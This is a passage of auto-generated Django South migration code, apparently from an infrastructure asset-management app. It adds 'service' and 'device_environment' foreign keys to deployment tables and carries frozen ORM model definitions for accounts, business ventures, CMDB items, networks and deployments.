'network': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.Network']", 'null': 'True', 'blank': 'True'}),
'number': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'scan_summary': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['scan.ScanSummary']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'snmp_community': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '64', 'null': 'True', 'blank': 'True'}),
'snmp_name': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'snmp_version': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
},
'discovery.marginkind': {
'Meta': {'object_name': 'MarginKind'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'margin': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'})
},
'discovery.network': {
'Meta': {'ordering': "(u'vlan',)", 'object_name': 'Network'},
'address': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '18'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'custom_dns_servers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['dnsedit.DNSServer']", 'null': 'True', 'blank': 'True'}),
'data_center': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DataCenter']", 'null': 'True', 'blank': 'True'}),
'dhcp_broadcast': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'dhcp_config': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'environment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.Environment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'gateway': ('django.db.models.fields.IPAddressField', [], {'default': 'None', 'max_length': '15', 'null': 'True', 'blank': 'True'}),
'gateway_as_int': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignore_addresses': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.NetworkKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'last_scan': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'max_ip': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'min_ip': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'racks': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['discovery.Device']", 'symmetrical': 'False'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'reserved': ('django.db.models.fields.PositiveIntegerField', [], {'default': '10'}),
'reserved_top_margin': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'terminators': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['discovery.NetworkTerminator']", 'symmetrical': 'False'}),
'vlan': ('django.db.models.fields.PositiveIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'})
},
'discovery.networkkind': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'NetworkKind'},
'icon': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'discovery.networkterminator': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'NetworkTerminator'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'dnsedit.dnsserver': {
'Meta': {'object_name': 'DNSServer'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.IPAddressField', [], {'unique': 'True', 'max_length': '15'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'})
},
'scan.scansummary': {
'Meta': {'object_name': 'ScanSummary'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'false_positive_checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'job_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '36'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'previous_checksum': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
'tags.tag': {
'Meta': {'object_name': 'Tag'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['account.Profile']"}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'tags_tag_tags'", 'to': "orm['contenttypes.ContentType']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.PositiveIntegerField', [], {'default': '39'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '75'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'official': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'stem': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'related_tags'", 'null': 'True', 'to': "orm['tags.TagStem']"})
},
'tags.tagstem': {
'Meta': {'object_name': 'TagStem'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.PositiveIntegerField', [], {'default': '39'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '75'}),
'tag_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
}
}
complete_apps = ['deployment']
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'ArchivedDeployment.service'
db.add_column('deployment_archiveddeployment', 'service',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
# Adding field 'ArchivedDeployment.device_environment'
db.add_column('deployment_archiveddeployment', 'device_environment',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
# Adding field 'Deployment.service'
db.add_column('deployment_deployment', 'service',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
# Adding field 'Deployment.device_environment'
db.add_column('deployment_deployment', 'device_environment',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['cmdb.CI'], null=True, on_delete=models.SET_NULL),
keep_default=False)
def backwards(self, orm):
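# ForeignKey fields are stored in the database as "<field>_id" columns,
# so the reverse migration drops the "_id" columns created by forwards().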
# Deleting field 'ArchivedDeployment.service'
db.delete_column('deployment_archiveddeployment', 'service_id')
# Deleting field 'ArchivedDeployment.device_environment'
db.delete_column('deployment_archiveddeployment', 'device_environment_id')
# Deleting field 'Deployment.service'
db.delete_column('deployment_deployment', 'service_id')
# Deleting field 'Deployment.device_environment'
db.delete_column('deployment_deployment', 'device_environment_id')
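# The frozen ORM definitions below are auto-generated by South and describe the
# model state at the time this migration was created; they back the `orm`
# argument passed to forwards()/backwards() and are not live model classes.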
models = {
'account.profile': {
'Meta': {'object_name': 'Profile'},
'activation_token': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '40', 'blank': 'True'}),
'birth_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'company': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'cost_center': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'country': ('django.db.models.fields.PositiveIntegerField', [], {'default': '153'}),
'department': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'employee_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'gender': ('django.db.models.fields.PositiveIntegerField', [], {'default': '2'}),
'home_page': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', u'default': '1', 'null': 'False', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'manager': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'nick': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '30', 'blank': 'True'}),
'profit_center': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'time_zone': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'business.businesssegment': {
'Meta': {'object_name': 'BusinessSegment'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'business.department': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'Department'},
'icon': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'True', u'default': 'None', 'null': 'True', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'business.profitcenter': {
'Meta': {'object_name': 'ProfitCenter'},
'description': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'business.venture': {
'Meta': {'ordering': "(u'parent__symbol', u'symbol')", 'unique_together': "((u'parent', u'symbol'),)", 'object_name': 'Venture'},
'business_segment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.BusinessSegment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'data_center': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DataCenter']", 'null': 'True', 'blank': 'True'}),
'department': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.Department']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_infrastructure': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'margin_kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.MarginKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "u'child_set'", 'null': 'True', 'blank': 'True', 'to': "orm['business.Venture']"}),
'path': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'profit_center': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.ProfitCenter']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'show_in_ralph': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'symbol': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '32', 'blank': 'True'}),
'verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'business.venturerole': {
'Meta': {'ordering': "(u'parent__name', u'name')", 'unique_together': "((u'name', u'venture'),)", 'object_name': 'VentureRole'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '75'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "u'child_set'", 'null': 'True', 'blank': 'True', 'to': "orm['business.VentureRole']"}),
'path': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.Venture']"})
},
'cmdb.ci': {
'Meta': {'unique_together': "((u'content_type', u'object_id'),)", 'object_name': 'CI'},
'added_manually': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'barcode': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'business_service': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'layers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CILayer']", 'symmetrical': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'owners': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CIOwner']", 'through': "orm['cmdb.CIOwnership']", 'symmetrical': 'False'}),
'pci_scope': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'relations': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CI']", 'through': "orm['cmdb.CIRelation']", 'symmetrical': 'False'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '11'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '11'}),
'technical_service': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIType']"}),
'uid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'zabbix_id': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'})
},
'cmdb.cilayer': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'CILayer'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'connected_types': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CIType']", 'symmetrical': 'False', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'icon': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'True', u'default': 'None', 'null': 'True', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'cmdb.ciowner': {
'Meta': {'object_name': 'CIOwner'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'profile': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['account.Profile']", 'unique': 'True'})
},
'cmdb.ciownership': {
'Meta': {'object_name': 'CIOwnership'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'ci': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CI']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIOwner']"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'cmdb.cirelation': {
'Meta': {'unique_together': "((u'parent', u'child', u'type'),)", 'object_name': 'CIRelation'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'child': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'child'", 'to': "orm['cmdb.CI']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'parent'", 'to': "orm['cmdb.CI']"}),
'readonly': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.IntegerField', [], {'max_length': '11'})
},
'cmdb.citype': {
'Meta': {'object_name': 'CIType'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'icon_class': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.SlugField', [], {'max_length': '50'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'deployment.archiveddeployment': {
'Meta': {'ordering': "(u'-created',)", 'object_name': 'ArchivedDeployment'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'device': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.Device']"}),
'device_environment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'done_plugins': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'is_running': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mac': (u'lck.django.common.models.MACAddressField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', 'null': 'False', 'db_index': 'False'}),
'mass_deployment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.MassDeployment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'status_lastchanged': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'venture_role': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.VentureRole']", 'null': 'True', 'on_delete': 'models.SET_NULL'})
},
'deployment.deployment': {
'Meta': {'ordering': "(u'-created',)", 'object_name': 'Deployment'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'device': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.Device']"}),
'device_environment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'done_plugins': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'is_running': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mac': (u'lck.django.common.models.MACAddressField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', 'null': 'False', 'db_index': 'False'}),
'mass_deployment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.MassDeployment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'status_lastchanged': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'venture_role': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.VentureRole']", 'null': 'True', 'on_delete': 'models.SET_NULL'})
},
'deployment.deploymentpoll': {
'Meta': {'object_name': 'DeploymentPoll'},
'checked': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'deployment.massdeployment': {
'Meta': {'ordering': "(u'-created',)", 'object_name': 'MassDeployment'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'csv': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'generated_csv': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_done': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'})
},
'deployment.preboot': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'Preboot'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'files': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['deployment.PrebootFile']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'deployment.prebootfile': {
'Meta': {'object_name': 'PrebootFile'},
'description': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'ftype': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', u'default': '101', 'null': 'False', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'raw_config': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
'discovery.connection': {
'Meta': {'object_name': 'Connection'},
'connection_type': ('django.db.models.fields.PositiveIntegerField', [], {}),
